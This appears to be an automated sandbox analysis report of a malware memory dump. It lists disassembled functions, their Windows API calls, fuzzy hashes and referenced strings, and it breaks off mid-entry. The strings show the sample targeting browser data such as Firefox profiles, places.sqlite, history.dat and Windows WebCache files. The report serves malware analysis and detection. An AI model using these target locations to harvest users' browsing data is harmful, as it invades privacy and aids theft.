                                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                            • memset.MSVCRT ref: 004033B7
                                                                                            • memcpy.MSVCRT ref: 004033D0
                                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                            • String ID: $0.@
                                                                                            • API String ID: 3030842498-1896041820
                                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 2941347001-0
                                                                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403C09
                                                                                            • memset.MSVCRT ref: 00403C1E
                                                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                            • wcscat.MSVCRT ref: 00403C47
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                            • wcscat.MSVCRT ref: 00403C70
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcscat$Closewcscpywcslen
                                                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                            • API String ID: 3249829328-1174173950
                                                                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040A824
                                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 669240632-0
                                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 00414458
                                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                            • String ID: "%s"
                                                                                            • API String ID: 1343145685-3297466227
                                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                                            • API String ID: 1714573020-3385500049
                                                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004087D6
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                            • memset.MSVCRT ref: 00408828
                                                                                            • memset.MSVCRT ref: 00408840
                                                                                            • memset.MSVCRT ref: 00408858
                                                                                            • memset.MSVCRT ref: 00408870
                                                                                            • memset.MSVCRT ref: 00408888
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 2911713577-0
                                                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp
                                                                                            • String ID: @ $SQLite format 3
                                                                                            • API String ID: 1475443563-3708268960
                                                                                            • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                            • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                            • memset.MSVCRT ref: 00414C87
                                                                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                            • API String ID: 2705122986-2036018995
                                                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmpqsort
                                                                                            • String ID: /nosort$/sort
                                                                                            • API String ID: 1579243037-1578091866
                                                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040E60F
                                                                                            • memset.MSVCRT ref: 0040E629
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Strings
                                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                            • API String ID: 3354267031-2114579845
                                                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                            • API String ID: 2221118986-1725073988
                                                                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChangeCloseFindNotificationSleep
                                                                                            • String ID: }A
                                                                                            • API String ID: 1821831730-2138825249
                                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@DeleteObject
                                                                                            • String ID: r!A
                                                                                            • API String ID: 1103273653-628097481
                                                                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1033339047-0
                                                                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                            • memcmp.MSVCRT ref: 00444BA5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$memcmp
                                                                                            • String ID: $$8
                                                                                            • API String ID: 2808797137-435121686
                                                                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                              • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                            • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                              • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                            • String ID:
                                                                                            • API String ID: 1042154641-0
                                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                            • memset.MSVCRT ref: 00403A55
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                            • String ID: history.dat$places.sqlite
                                                                                            • API String ID: 3093078384-467022611
                                                                                            • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
